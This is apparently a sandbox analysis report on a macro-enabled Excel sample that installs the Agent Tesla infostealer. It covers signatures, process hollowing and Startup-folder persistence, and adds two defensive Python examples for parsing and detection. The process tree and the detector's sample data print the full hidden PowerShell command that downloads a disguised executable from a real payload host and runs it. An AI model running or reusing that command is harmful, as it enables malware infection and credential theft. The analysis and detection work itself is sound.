Analysis
max time kernel: 130s
max time network: 136s
platform: windows7_x64
resource: win7
submitted: 10/07/2020, 07:13
Static task: static1
Behavioral task: behavioral1 (sample CO-MFE-6-2020.xlsm, resource win7)
Behavioral task: behavioral2 (sample CO-MFE-6-2020.xlsm, resource win10v200430)
General
Target: CO-MFE-6-2020.xlsm
Size: 173KB
MD5: 84ba27c4b3083be263a54322adec3149
SHA1: 2548d9097c1b27f064a7089afe393fde0fbfa64d
SHA256: fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011
SHA512: 1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e
Malware Config
Extracted URL: http://shopcart.indbytes.com/cig/4501307788.jpg
(Payload download URL taken from the macro's PowerShell command line. The .jpg extension is a disguise: the response is written to %TEMP%\Name.exe and executed, see the Processes section.)
Signatures
Suspicious use of SetWindowsHookEx (4 IoCs)
  PID 1072 EXCEL.EXE (x3); PID 1132 RegAsm.exe (x1)
  Window hooks from Excel itself are common and not significant on their own; a hook installed by RegAsm.exe (the .NET assembly registration tool, which has no reason to hook input) is the notable one and fits the Agent Tesla keylogger.
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  PID 1784 powershell.exe (x2); PID 1132 RegAsm.exe (x2)
Blacklisted process makes network request (1 IoC)
  flow 5: PID 1784 powershell.exe (the DownloadFile request for the extracted URL)
Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  PID 1072 EXCEL.EXE
Executes dropped EXE (1 IoC)
  PID 1984 Name.exe
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
AgentTesla
  Agent Tesla is an information stealer with remote-access (RAT) features, written in .NET (VB.NET). The browser, email-client and FTP-client credential reads above, together with the keyboard hook in RegAsm.exe, are the Agent Tesla behaviors observed in this run; the payload is injected into RegAsm.exe (PID 1132) by Name.exe (see WriteProcessMemory and SetThreadContext below).
Office loads VBA resources, possible macro or embedded object present
Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe (by Name.exe). Anything in the per-user Startup folder runs at the next logon, so this is the persistence mechanism.
Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (PID 1072) is not expected to spawn cmd.exe (PID 1780).
Suspicious use of WriteProcessMemory (18 IoCs)
  PID 1072 EXCEL.EXE wrote to memory of PID 1780 cmd.exe (x3)
  PID 1780 cmd.exe wrote to memory of PID 1784 powershell.exe (x3)
  PID 1784 powershell.exe wrote to memory of PID 1984 Name.exe (x4)
  PID 1984 Name.exe wrote to memory of PID 1132 RegAsm.exe (x8)
  A few writes from a parent into a process it has just created are produced by CreateProcess itself (it writes the process parameters into the new child); the eight writes from Name.exe into RegAsm.exe, combined with SetThreadContext and MapViewOfSection below, are the process-hollowing pattern.
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 1784 powershell.exe; Token: SeDebugPrivilege, PID 1132 RegAsm.exe
Suspicious behavior: MapViewOfSection (1 IoC)
  PID 1984 Name.exe
Suspicious use of SetThreadContext (1 IoC)
  PID 1984 Name.exe set thread context of PID 1132 RegAsm.exe
Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
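The WriteProcessMemory and SetThreadContext rows above are printed by the report as one run-together line per signature, which makes the injection chain hard to read. The following is an added example (not part of the Triage report or its tooling): a small parser for that row layout that rebuilds the writer-to-target graph and labels each pair. SIGNATURE_ROWS is the report's own row text, PROCESS_TREE is the pid-to-image relation read off the Processes section (the root's parent is unknown in the report), and the verdict labels are this example's own heuristics.

```python
"""Rebuild the injection graph from this report's flattened WriteProcessMemory /
SetThreadContext rows and label each writer -> target pair."""
import re
from collections import Counter

# The rows exactly as the report prints them (one row per line here for
# readability; the parser also accepts the original run-together line).
SIGNATURE_ROWS = """
PID 1072 wrote to memory of 1780 1072 EXCEL.EXE 24
PID 1072 wrote to memory of 1780 1072 EXCEL.EXE 24
PID 1072 wrote to memory of 1780 1072 EXCEL.EXE 24
PID 1780 wrote to memory of 1784 1780 cmd.exe 26
PID 1780 wrote to memory of 1784 1780 cmd.exe 26
PID 1780 wrote to memory of 1784 1780 cmd.exe 26
PID 1784 wrote to memory of 1984 1784 powershell.exe 28
PID 1784 wrote to memory of 1984 1784 powershell.exe 28
PID 1784 wrote to memory of 1984 1784 powershell.exe 28
PID 1784 wrote to memory of 1984 1784 powershell.exe 28
PID 1984 wrote to memory of 1132 1984 Name.exe 29
PID 1984 wrote to memory of 1132 1984 Name.exe 29
PID 1984 wrote to memory of 1132 1984 Name.exe 29
PID 1984 wrote to memory of 1132 1984 Name.exe 29
PID 1984 wrote to memory of 1132 1984 Name.exe 29
PID 1984 wrote to memory of 1132 1984 Name.exe 29
PID 1984 wrote to memory of 1132 1984 Name.exe 29
PID 1984 wrote to memory of 1132 1984 Name.exe 29
PID 1984 set thread context of 1132 1984 Name.exe 29
"""

# pid -> (image, parent pid), read off the Processes section of the report.
# The parent of EXCEL.EXE is not shown there, hence None (assumption).
PROCESS_TREE = {
    1072: ("EXCEL.EXE", None),
    1780: ("cmd.exe", 1072),
    1784: ("powershell.exe", 1780),
    1984: ("Name.exe", 1784),
    1132: ("RegAsm.exe", 1984),
}

# Row layout: "PID <src> <action> of <dst> <src> <src image> <n>"
ROW_RE = re.compile(
    r"PID (?P<src>\d+) (?P<action>wrote to memory|set thread context) of (?P<dst>\d+) "
    r"(?P=src) (?P<image>\S+) \d+"
)


def parse_rows(text):
    """Return (src_pid, action, dst_pid, src_image) tuples for every row in text."""
    return [(int(m["src"]), m["action"], int(m["dst"]), m["image"])
            for m in ROW_RE.finditer(text)]


def injection_verdicts(events, tree):
    """Group the events by (src, dst) and label each pair (heuristic labels)."""
    writes = Counter()
    context_pairs = set()
    for src, action, dst, _ in events:
        if action == "wrote to memory":
            writes[(src, dst)] += 1
        else:
            context_pairs.add((src, dst))
    verdicts = []
    for src, dst in sorted(set(writes) | context_pairs):
        n = writes.get((src, dst), 0)
        src_image = tree[src][0]
        dst_image, dst_parent = tree[dst]
        own_child = dst_parent == src
        if (src, dst) in context_pairs and own_child:
            # Repeated writes into a process it just spawned, then
            # SetThreadContext to redirect its execution: process hollowing.
            verdict = "process hollowing"
        elif (src, dst) in context_pairs:
            verdict = "thread hijack of an existing process"
        elif own_child:
            # CreateProcess writes the new process's parameters into the child
            # through NtWriteVirtualMemory, so a few parent->child writes are expected.
            verdict = "parent->child writes consistent with CreateProcess"
        else:
            verdict = "unexplained cross-process write"
        verdicts.append({"src": src, "src_image": src_image, "dst": dst,
                         "dst_image": dst_image, "writes": n, "verdict": verdict})
    return verdicts


if __name__ == "__main__":
    for v in injection_verdicts(parse_rows(SIGNATURE_ROWS), PROCESS_TREE):
        print(f"{v['src']} {v['src_image']} -> {v['dst']} {v['dst_image']}: "
              f"{v['writes']} write(s), {v['verdict']}")
```

Run stand-alone it prints four pairs; only Name.exe -> RegAsm.exe carries the hollowing label, the other three are the expected CreateProcess writes along the Excel -> cmd -> PowerShell -> Name.exe chain. The MapViewOfSection row for Name.exe is not in this row layout and is not parsed; it supports the same reading.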
Processes
[1] PID 1072  C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm
    (/dde is the switch Explorer normally passes when a document is opened by double-click; the sample is launched the way a user would open it.)
    - Suspicious use of SetWindowsHookEx
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of WriteProcessMemory
  [2] PID 1780  C:\Windows\System32\cmd.exe  (parent: PID 1072 EXCEL.EXE)
      "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
    [3] PID 1784  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (parent: PID 1780 cmd.exe)
        powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
        - Suspicious behavior: EnumeratesProcesses
        - Blacklisted process makes network request
        - Suspicious use of WriteProcessMemory
        - Suspicious use of AdjustPrivilegeToken
      [4] PID 1984  C:\Users\Admin\AppData\Local\Temp\Name.exe  (parent: PID 1784 powershell.exe; this is the downloaded "4501307788.jpg" written to %TEMP%)
          "C:\Users\Admin\AppData\Local\Temp\Name.exe"
          - Executes dropped EXE
          - Drops startup file
          - Suspicious use of WriteProcessMemory
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of SetThreadContext
        [5] PID 1132  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  (parent: PID 1984 Name.exe; launched with no arguments and then written to and redirected via SetThreadContext, so the code running here is the injected payload, not RegAsm)
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            - Suspicious use of SetWindowsHookEx
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
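The cmd.exe and powershell.exe command lines in this tree carry every classic downloader marker at once: an Office parent, -executionpolicy bypass, -W Hidden, WebClient.DownloadFile, a payload URL with an image extension written out as an .exe, and an immediate ShellExecute of the result. The following is an added example (not part of the Triage report or its tooling) of detection logic that scores process-creation records for exactly these markers. The records are constructed in a Sysmon Event ID 1 style from the process tree above; the parent PID 820 of EXCEL.EXE and the benign PowerShell event (PID 4242) are assumptions added for contrast and are not in the report.

```python
"""Flag the Office -> cmd.exe -> PowerShell downloader chain from process-creation records."""
import re
from dataclasses import dataclass, field

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Extensions a downloader may use to disguise an executable payload (the
# sample fetches "4501307788.jpg" and saves it as Name.exe).
DISGUISE_EXTS = {"jpg", "jpeg", "png", "gif", "bmp", "txt", "pdf", "dat"}

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# A quoted '\Something.exe' fragment inside the PowerShell string: the drop name.
DROP_RE = re.compile(r"'\\([^'\\]+\.exe)'", re.I)

# Constructed records (Sysmon Event ID 1 style) taken from the process tree
# above. PID 820 and the benign PID 4242 event are assumptions for contrast.
SAMPLE_EVENTS = [
    {"pid": 1072, "ppid": 820,
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm'},
    {"pid": 1780, "ppid": 1072,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'''"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')'''},
    {"pid": 1784, "ppid": 1780,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')'''},
    {"pid": 4242, "ppid": 820,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -command Get-ChildItem C:\Users"},
]


@dataclass
class Finding:
    pid: int
    image: str
    reasons: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    dropped: list = field(default_factory=list)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def cmdline_indicators(cmdline: str):
    """Return (reasons, urls, dropped_names) for one command line."""
    low = cmdline.lower()
    reasons = []
    # PowerShell accepts unambiguous parameter prefixes, so match -ex*, -ep and -w*.
    if re.search(r"-e(x\w*|p)\s+bypass", low):
        reasons.append("execution policy bypass")
    if re.search(r"-w\w*\s+hidden", low):
        reasons.append("hidden window")
    if any(k in low for k in ("downloadfile", "downloadstring", "invoke-webrequest")):
        reasons.append("downloads from the web")
    if any(k in low for k in ("shellexecute", "start-process", "invoke-expression")):
        reasons.append("launches or evaluates downloaded content")
    urls = sorted(set(URL_RE.findall(cmdline)))
    dropped = sorted(set(DROP_RE.findall(cmdline)))
    for url in urls:
        ext = url.rsplit(".", 1)[-1].lower()
        if ext in DISGUISE_EXTS and dropped:
            reasons.append(f"payload fetched as .{ext} but written as {dropped[0]}")
    return reasons, urls, dropped


def detect(events):
    """Return a Finding for each event worth an alert, in input order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["image"])
        reasons, urls, dropped = cmdline_indicators(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        office_child = (parent is not None
                        and basename(parent["image"]) in OFFICE_IMAGES
                        and image in SHELL_IMAGES)
        if office_child:
            reasons.insert(0, f"{basename(parent['image'])} spawned {image}")
        # A lone DownloadFile is common in admin scripts; alert on an Office
        # parent, or on two or more indicators together.
        if office_child or len(reasons) >= 2:
            findings.append(Finding(e["pid"], image, reasons, urls, dropped))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"PID {f.pid} {f.image}: {'; '.join(f.reasons)}")
        for u in f.urls:
            print("  URL:", u)
```

The Office-parent rule fires on cmd.exe (PID 1780) regardless of its arguments, which is what the report's "Process spawned unexpected child process" signature does; the indicator count fires on powershell.exe (PID 1784) even though its parent is cmd.exe, and the benign PID 4242 record produces nothing. The extracted URL and drop name are the same IoCs the report lists under Malware Config and in the tree.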